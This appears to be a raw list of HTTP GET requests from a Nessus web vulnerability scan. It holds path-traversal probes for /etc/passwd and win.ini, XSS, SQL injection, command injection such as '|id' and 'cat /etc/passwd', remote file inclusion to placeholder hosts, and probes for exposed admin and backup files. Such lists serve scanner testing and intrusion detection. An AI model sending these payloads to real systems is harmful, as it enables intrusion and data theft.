リクエスト例

GET %. HTTP/1.1
GET %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
GET . HTTP/1.0
GET ../../../../../../../../../../../../windows/win.ini HTTP/1.1
GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ HTTP/1.1
GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini HTTP/1.1
GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1
GET /
GET / HTTP/1.0
GET / HTTP/1.1
GET /!pwds.txt HTTP/1.1
GET /%00/ HTTP/1.1
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1
GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini HTTP/1.1
GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\winnt\\win.ini HTTP/1.1
GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1
GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini HTTP/1.1
GET /%2f/admin.html HTTP/1.1
GET /%3f.jsp HTTP/1.1
GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini HTTP/1.1
GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin%2eini HTTP/1.1
GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini HTTP/1.1
GET /%80../%80../%80../%80../%80../%80../windows/win.ini HTTP/1.1
GET /%80../%80../%80../%80../%80../%80../winnt/win.ini HTTP/1.1
GET /%NETHOOD%/ HTTP/1.1
GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/win.ini HTTP/1.1
GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini HTTP/1.1
GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini HTTP/1.1
GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini HTTP/1.1
GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd HTTP/1.1
GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini HTTP/1.1
GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/winnt/win.ini HTTP/1.1
GET /*.shtml//index.jsp HTTP/1.1
GET /+CSCOE+/win.js HTTP/1.1
GET /- HTTP/1.1
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
GET /.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1
GET /.%252e/.%252e/.%252e/.%252e/winnt/win.ini HTTP/1.1
GET /.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
GET /..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd HTTP/1.1
GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1
GET /..../..../..../..../..../..../..../..../..../winnt/win.ini HTTP/1.1
GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini HTTP/1.1
GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\winnt\\win.ini HTTP/1.1
GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
GET /.../.../.../.../.../.../.../.../.../winnt/win.ini HTTP/1.1
GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini HTTP/1.1
GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini HTTP/1.1
GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
GET /../../../../../../../../../../../../winnt/win.ini HTTP/1.1
GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
GET /..htaccess.swp HTTP/1.1
GET /./../../../../../../../../../../../etc/passwd HTTP/1.1
GET /././.. HTTP/1.1
GET /././././././../../../../../etc/passwd HTTP/1.1
GET /././././././../../../../../windows/win.ini HTTP/1.1
GET /././././././../../../../../winnt/win.ini HTTP/1.1
GET /./WEB-INF/ HTTP/1.1
GET /.DS_Store HTTP/1.1
GET /.anydomain.test HTTP/1.0
GET /.bak/ HTTP/1.1
GET /.cobalt HTTP/1.1
GET /.cobalt/ HTTP/1.1
GET /.git/HEAD HTTP/1.1
GET /.git/info/refs?service=git-upload-pack HTTP/1.1
GET /.htaccess.1 HTTP/1.1
GET /.htaccess.bak HTTP/1.1
GET /.htaccess.copy HTTP/1.1
GET /.htaccess.old HTTP/1.1
GET /.htaccess.tmp HTTP/1.1
GET /.htaccess.~1~ HTTP/1.1
GET /.htaccess~ HTTP/1.1
GET /.svn/entries HTTP/1.1
GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
GET // HTTP/1.1
GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
GET //admincp/login.php HTTP/1.1
GET //etc/passwd HTTP/1.1
GET //index.php?kietu[url_hit]=http://xxxxxxxx/ HTTP/1.1
GET //login.jsp HTTP/1.1
GET //login/login HTTP/1.1
GET //perl.exe?-v HTTP/1.1
GET //perl?-v HTTP/1.1
GET //plugins/db/mysql/mysql.inc.php HTTP/1.1
GET //tkbUZyc3.asp HTTP/1.0
GET //user/index.php HTTP/1.1
GET /1/ HTTP/1.1
GET /10/ HTTP/1.1
GET /1410938498/facts/subdomain.domain.tld HTTP/1.1
GET /1410938731-ror_session_fixation.nasl HTTP/1.1
GET /2/ HTTP/1.1
GET /3/ HTTP/1.1
GET /4/ HTTP/1.1
GET /4images/ HTTP/1.1
GET /5/ HTTP/1.1
GET /500page.jsp HTTP/1.1
GET /6/ HTTP/1.1
GET /7/ HTTP/1.1
GET /8/ HTTP/1.1
GET /9/ HTTP/1.1
GET /99articles/ HTTP/1.1
GET /9DjwxNn8.asmx HTTP/1.1
GET /<IMG%20SRC=\
GET /<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.asp HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.aspx HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.cfc HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.cfm HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.cgi HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.dll HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.do HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.exe HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.fts HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.htm HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.html HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.idc HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.jsp HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.jspa HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.kspx HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.mscgi HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.nsf HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.php HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.php3 HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.pl HTTP/1.1
GET /<scr ipt>cross_site_scripting.nasl</script>.x HTTP/1.1
GET /<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /<scr ipt>foo</script> HTTP/1.1
GET /? HTTP/1.1
GET /?<IMG%20SRC=\
GET /?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /?<scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET /?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /?M=A HTTP/1.1
GET /?Mode=debug HTTP/1.1
GET /?cmd=Config HTTP/1.1
GET /?ho+{COMPLETE_VERSION} HTTP/1.1
GET /?mod=read&id=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /?p=subscribe HTTP/1.1
GET /?showimage=')%20UNION%20SELECT%20'pixelpost_15rc1.nasl-1410938963.jpg'%20as%20id%2c%201126300913%20as%20headline%2c%20589614893%20as%20datetime%2c%20341432809%20as%20body%2c%20459645963%20as%20category%2c%20598276151%20as%20image-- HTTP/1.1
GET /?title=Special:Recentchanges&feed=atom HTTP/1.1
GET /?user=jffnms_user_sql_injection.nasl'%20UNION%20SELECT%202%2c'admin'%2c'%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.'%2c'Administrator'--&file=index&pass= HTTP/1.1
GET /A1HWMkI4.aspx HTTP/1.1
GET /About/frmAbout.aspx HTTP/1.1
GET /Admin.php HTTP/1.1
GET /Admin/ HTTP/1.1
GET /Admin/index.jsp HTTP/1.1
GET /AdminWeb/ HTTP/1.1
GET /Admin_files/ HTTP/1.1
GET /Administration/ HTTP/1.1
GET /AdvWebAdmin/ HTTP/1.1
GET /Agent/ HTTP/1.1
GET /Agents/ HTTP/1.1
GET /Album/ HTTP/1.1
GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.1
GET /AlbumArt_/ HTTP/1.1
GET /BizTalkServerDocs/ HTTP/1.1
GET /BizTalkServerRepository/ HTTP/1.1
GET /BizTalkTracking/ HTTP/1.1
GET /Boutiques/ HTTP/1.1
GET /BrowserWeb/portal/portalbanner.htm HTTP/1.1
GET /CFIDE/administrator/index.cfm HTTP/1.1
GET /CFIDE/administrator/settings/version.cfm HTTP/1.1
GET /CFIDE/probe.cfm HTTP/1.1
GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/coldfusion_fckeditor_file_upload-1410939095.cfm%0d HTTP/1.1
GET /CGI-BIN/printenv.pl HTTP/1.1
GET /CS/ HTTP/1.1
GET /CSCOnm/servlet/AutoLogin.jsp?URL=http://www.example.com/%0d%0aX-ciscoworks_response_splitting-nasl:%201410939072 HTTP/1.1
GET /CSCOnm/servlet/login/login.jsp HTTP/1.1
GET /CSCOnm/servlet/login/login.jsp?URL=CSCOnm/servlet/com.cisco.core.mice.main?command=</script><scr ipt>alert(document.cookie)</script> HTTP/1.1
GET /CVS/ HTTP/1.1
GET /CVS/Entries HTTP/1.1
GET /CYHrrhw6.aspx HTTP/1.1
GET /CategoryView.aspx?category=nessus HTTP/1.1
GET /ChangeLog HTTP/1.1
GET /Citrix.Dwm.WorkloadBalance/Service HTTP/1.1
GET /Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
GET /ConsoleHelp/default.jsp HTTP/1.1
GET /ContentServer HTTP/1.1
GET /ControlManager/cgi-bin/dm_autologin_cgi.exe?-V HTTP/1.1
GET /ControlManager/default.htm HTTP/1.1
GET /ControllerWeb/ HTTP/1.1
GET /Corporate/ HTTP/1.1
GET /Count.cgi?align=topcenter HTTP/1.1
GET /CrystalReportWebFormViewer/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
GET /CrystalReportWebFormViewer2/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
GET /DB4Web/ HTTP/1.1
GET /DB4Web/ipvsix-test055-v:23/foo HTTP/1.1
GET /DMR/ HTTP/1.1
GET /Default.aspx HTTP/1.1
GET /DesktopDirector HTTP/1.1
GET /DigitalScribe/ HTTP/1.1
GET /Director HTTP/1.1
GET /DocuColor/ HTTP/1.1
GET /EZPhotoSales/ HTTP/1.1
GET /Edit.jsp?page=User&editor=../../../Install HTTP/1.1
GET /G5QZgyb6.asmx HTTP/1.1
GET /GTcatalog/index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /GTcatalog/password.inc HTTP/1.1
GET /GWextranet/ HTTP/1.1
GET /GXApp/ HTTP/1.1
GET /Gallery/ HTTP/1.1
GET /GpFKzBfT.aspx HTTP/1.1
GET /HB/ HTTP/1.1
GET /HBTemplates/ HTTP/1.1
GET /HEAD HTTP/1.1
GET /HNAP1/ HTTP/1.1
GET /Home.do HTTP/1.1
GET /IBMWebAS/ HTTP/1.1
GET /IDMProv/jsps/help/Help.jsp HTTP/1.1
GET /IMS-AA-IDP/logonPrompt.do HTTP/1.1
GET /IlohaMail/ HTTP/1.1
GET /ImageVue/ HTTP/1.1
GET /InfoViewApp/logon.jsp HTTP/1.1
GET /InitialPage.asp HTTP/1.1
GET /Install/ HTTP/1.1
GET /JBookIt/ HTTP/1.1
GET /JSPWiki/ HTTP/1.1
GET /Log/ HTTP/1.1
GET /LoginPage.do HTTP/1.1
GET /MM/ HTTP/1.1
GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1
GET /Mail/ HTTP/1.1
GET /MessagingManager/ HTTP/1.1
GET /Msword/ HTTP/1.1
GET /NASApp/nessus/ HTTP/1.1
GET /NCMContainer.cc HTTP/1.1
GET /NOCC/ HTTP/1.1
GET /NSearch/ HTTP/1.1
GET /NULL.ida HTTP/1.1
GET /NetDynamic/ HTTP/1.1
GET /NetDynamics/ HTTP/1.1
GET /News/ HTTP/1.1
GET /NonExistant1575782285/ HTTP/1.1
GET /OnlineViewing/ HTTP/1.1
GET /Orion/Login.asp HTTP/1.1
GET /Orion/Login.aspx HTTP/1.1
GET /OvCgi/ HTTP/1.1
GET /OvCgi/OpenView5.exe HTTP/1.1
GET /OvCgi/freeIPaddrs.ovpl?netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20|%20id| HTTP/1.1
GET /OvCgi/ifaceMgr/setMon.ovpl?Action=continue&hostname=hp_openview_nnm_multiple_cmd_exec.nasl-1410938841|id HTTP/1.1
GET /OvCgi/ifaceMgr/setNotMon.ovpl?Action=continue&hostname=hp_openview_nnm_multiple_cmd_exec.nasl-1410938841|id HTTP/1.1
GET /OvCgi/ovlaunch.exe HTTP/1.1
GET /OvCgi/webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
GET /OvCgi/webappmon.exe?ins=nowait&sel=localhost&act=ping HTTP/1.1
GET /PAN_help/en/wwhdata/common/files.js HTTP/1.1
GET /PAN_help/en/wwhelp/wwhimpl/common/private/title.js HTTP/1.1
GET /PDG_Cart/ HTTP/1.1
GET /PJreview_Neo.cgi?p=../../../../../../../../../../etc/passwd HTTP/1.1
GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1
GET /PUBLIC/ADMIN/INDEX.HTM HTTP/1.1
GET /PhpDocumentor/ HTTP/1.1
GET /Plone/ HTTP/1.1
GET /QI0_Xymb.ashx HTTP/1.1
GET /README.TXT HTTP/1.1
GET /README/ HTTP/1.1
GET /RELEASE-NOTES HTTP/1.1
GET /ROADS/ HTTP/1.1
GET /ROADS/cgi-bin/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
GET /Readme/ HTTP/1.1
GET /Remote/ HTTP/1.1
GET /Reporting/login/change_password.php?enable_auth=0 HTTP/1.1
GET /RootDevice.xml HTTP/1.1
GET /SAPHostControl/?wsdl HTTP/1.1
GET /SCRIPTS/printenv.pl HTTP/1.1
GET /SF2.5/docman/new.php HTTP/1.1
GET /SF2.5/patch/index.php HTTP/1.1
GET /SLwebmail/ShowLogin.dll?Language=fr HTTP/1.1
GET /SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1410939058%2c4%2c5 HTTP/1.1
GET /SProtectLinux/showpage.cgi?page=../html/splx_main.htm HTTP/1.1
GET /Sametime/buildinfo.txt HTTP/1.1
GET /Sametime/domino/html/sametime/buildinfoST75CF1.txt HTTP/1.1
GET /Security/login HTTP/1.1
GET /ServerView/SnmpView/SnmpListMibValues?SSL=&Server=(ip addr)&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1 HTTP/1.1
GET /SignIn.html HTTP/1.1
GET /SilverStream HTTP/1.1
GET /SilverStream/ HTTP/1.1
GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1
GET /SiteScope/ HTTP/1.1
GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1
GET /SnoopServlet/ HTTP/1.1
GET /SpamConsole/ HTTP/1.1
GET /Stats/ HTTP/1.1
GET /StoreDB/ HTTP/1.1
GET /SugarCRM/ HTTP/1.1
GET /SystemInfo HTTP/1.1
GET /TXWebService/ HTTP/1.1
GET /Templates/ HTTP/1.1
GET /ToDo/ HTTP/1.1
GET /UI/Login HTTP/1.1
GET /UI/Login?user=nessus-1410938469 HTTP/1.1
GET /ViewerFrame?Mode=Motion HTTP/1.1
GET /VncViewer.jar HTTP/1.1
GET /WANem/about.html HTTP/1.1
GET /WEB-INF./web.xml HTTP/1.1
GET /WSsamples/ HTTP/1.1
GET /WebAdmin/main.dll/dispChangePass HTTP/1.1
GET /WebBank/ HTTP/1.1
GET /WebCalendar/ HTTP/1.1
GET /WebConsole/login/auth/ HTTP/1.1
GET /WebDB/ HTTP/1.1
GET /WebID/IISWebAgentIF.dll?postdata=\
GET /WebServiceImpl/axis2-web/ HTTP/1.1
GET /WebShop/ HTTP/1.1
GET /WebTrend/ HTTP/1.1
GET /Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1
GET /Web_store/ HTTP/1.1
GET /Webcam/webcam.html HTTP/1.1
GET /Websense/cgi-bin/WsCgiLogin.exe?Page=login&UserName=nessus%22%3e%3cscript%3ealert('websense_username_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /WihPhoto/start.php HTTP/1.1
GET /Wiki/ HTTP/1.1
GET /WorkArea/ContentDesigner/ekformsiframe.aspx?id=\
GET /Wsusadmin/Errors/BrowserSettings.aspx HTTP/1.1
GET /XSL/ HTTP/1.1
GET /XaWoPATC.ashx HTTP/1.1
GET /XeroxCentreWareWeb/ HTTP/1.1
GET /YaBB.pl HTTP/1.1
GET /YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1
GET /Z4UIbRKguuPS.asp HTTP/1.1
GET /Z4UIbRKguuPS.cfm HTTP/1.1
GET /Z4UIbRKguuPS.cgi HTTP/1.1
GET /Z4UIbRKguuPS.html HTTP/1.1
GET /Z4UIbRKguuPS.inc HTTP/1.1
GET /Z4UIbRKguuPS.php HTTP/1.1
GET /Z4UIbRKguuPS.php3 HTTP/1.1
GET /Z4UIbRKguuPS.pl HTTP/1.1
GET /Z4UIbRKguuPS.sh HTTP/1.1
GET /Z4UIbRKguuPS.shtml HTTP/1.1
GET /_ScriptLibrary/ HTTP/1.1
GET /_admin/ HTTP/1.1
GET /_backup/ HTTP/1.1
GET /_bsLib/ HTTP/1.1
GET /_bslib/ HTTP/1.1
GET /_derived/ HTTP/1.1
GET /_errors/ HTTP/1.1
GET /_fpclass/ HTTP/1.1
GET /_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /_mem_bin/ HTTP/1.1
GET /_notes/ HTTP/1.1
GET /_notes/dwsync.xml HTTP/1.1
GET /_objects/ HTTP/1.1
GET /_old/ HTTP/1.1
GET /_pages/ HTTP/1.1
GET /_passwords/ HTTP/1.1
GET /_private/ HTTP/1.1
GET /_scripts/ HTTP/1.1
GET /_search HTTP/1.1
GET /_sharedtemplates/ HTTP/1.1
GET /_tests/ HTTP/1.1
GET /_themes/ HTTP/1.1
GET /_vti_bin/ HTTP/1.1
GET /_vti_bin/fpcount.exe HTTP/1.1
GET /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
GET /_vti_bot/ HTTP/1.1
GET /_vti_inf.html HTTP/1.1
GET /_vti_log/ HTTP/1.1
GET /_vti_pvt/ HTTP/1.1
GET /_vti_shm/ HTTP/1.1
GET /_vti_txt/ HTTP/1.1
GET /a/ HTTP/1.1
GET /a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
GET /a1stats/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
GET /aardvarktopsites/ HTTP/1.1
GET /about HTTP/1.1
GET /about.jsp HTTP/1.1
GET /about.php HTTP/1.1
GET /about/ HTTP/1.1
GET /aboutprinter.html HTTP/1.1
GET /acal/ HTTP/1.1
GET /acceso/ HTTP/1.1
GET /access/ HTTP/1.1
GET /accesswatch/ HTTP/1.1
GET /acciones/ HTTP/1.1
GET /account/ HTTP/1.1
GET /account/?action=Login HTTP/1.1
GET /account/login.php HTTP/1.1
GET /accounting/ HTTP/1.1
GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/nessus/ HTTP/1.1
GET /acegilogin.jsp HTTP/1.1
GET /acid/ HTTP/1.1
GET /acopia/ HTTP/1.1
GET /acp/index.php HTTP/1.1
GET /acp/lib/inserts.sql HTTP/1.1
GET /activatemember?activatecode=&member=%22%3e%3cscript%3ealert('mvnforum_activatemember_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /active.log HTTP/1.1
GET /activex/ HTTP/1.1
GET /actualanalyzer/ HTTP/1.1
GET /add.cgi HTTP/1.1
GET /add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
GET /add_user.php HTTP/1.1
GET /addentry.php HTTP/1.1
GET /addons/ HTTP/1.1
GET /addschup HTTP/1.1
GET /adlayer.php?layerstyle=../../../../../../../etc/passwd%00 HTTP/1.1
GET /adm/ HTTP/1.1
GET /admbook/ HTTP/1.1
GET /admcgi/ HTTP/1.1
GET /admentor/ HTTP/1.1
GET /admin-bak/ HTTP/1.1
GET /admin-old/ HTTP/1.1
GET /admin.back HTTP/1.1
GET /admin.back/ HTTP/1.1
GET /admin.php HTTP/1.1
GET /admin.php?dpt=conf&sub=general HTTP/1.1
GET /admin.php?loggedin=1 HTTP/1.1
GET /admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /admin.php?zfaction=config HTTP/1.1
GET /admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
GET /admin/ HTTP/1.1
GET /admin/LocalIndex.html HTTP/1.1
GET /admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1
GET /admin/admin.php HTTP/1.1
GET /admin/admin.php?sid=' HTTP/1.1
GET /admin/admin.php?sid=0' HTTP/1.1
GET /admin/cal_login.php HTTP/1.1
GET /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1410938915 HTTP/1.1
GET /admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
GET /admin/connect.inc HTTP/1.1
GET /admin/define.inc.php?match=http://xxxx./ HTTP/1.1
GET /admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd HTTP/1.1
GET /admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd|| HTTP/1.1
GET /admin/index.html HTTP/1.1
GET /admin/index.jsp HTTP/1.1
GET /admin/index.php HTTP/1.1
GET /admin/index.php?act=login&username='%20UNION%20SELECT%201,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus HTTP/1.1
GET /admin/index.php?cmd=login HTTP/1.1
GET /admin/index.php?username=advanced_poll_var_overwrite.nasl&pollvars[poll_username]=advanced_poll_var_overwrite.nasl&password=625972307&pollvars[poll_password]=b6736f61d8b5545eb8ffa6ca5359b65f HTTP/1.1
GET /admin/ip_manage.php HTTP/1.1
GET /admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
GET /admin/login-default.do HTTP/1.1
GET /admin/login.do HTTP/1.1
GET /admin/login.html HTTP/1.1
GET /admin/login.jsp?url=main.jsp HTTP/1.1
GET /admin/login.php HTTP/1.1
GET /admin/login/ HTTP/1.1
GET /admin/login/index.php HTTP/1.1
GET /admin/o12guest.mdb HTTP/1.1
GET /admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1
GET /admin/operators.php?view HTTP/1.1
GET /admin/plog-admin-functions.php?config[basedir]=/etc/passwd%00 HTTP/1.1
GET /admin/registry.jsp HTTP/1.1
GET /admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
GET /admin/setup.php HTTP/1.1
GET /admin/statistics/ConfigureStatistics HTTP/1.1
GET /admin/system?wt=xml HTTP/1.1
GET /admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1
GET /admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
GET /admin/users.php HTTP/1.1
GET /admin_/ HTTP/1.1
GET /admin_t/include/aff_liste_langue.php?rep_include=http://xxxxxxxx/ HTTP/1.1
GET /admincp/login.php HTTP/1.1
GET /administration/ HTTP/1.1
GET /administrator/ HTTP/1.1
GET /administrator/index.php HTTP/1.1
GET /adminuser/ HTTP/1.1
GET /adminweb/ HTTP/1.1
GET /admisapi/ HTTP/1.1
GET /adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
GET /adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /ads/ HTTP/1.1
GET /adserver/ HTTP/1.1
GET /adxmlrpc.php HTTP/1.1
GET /af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
GET /agenda.php3 HTTP/1.1
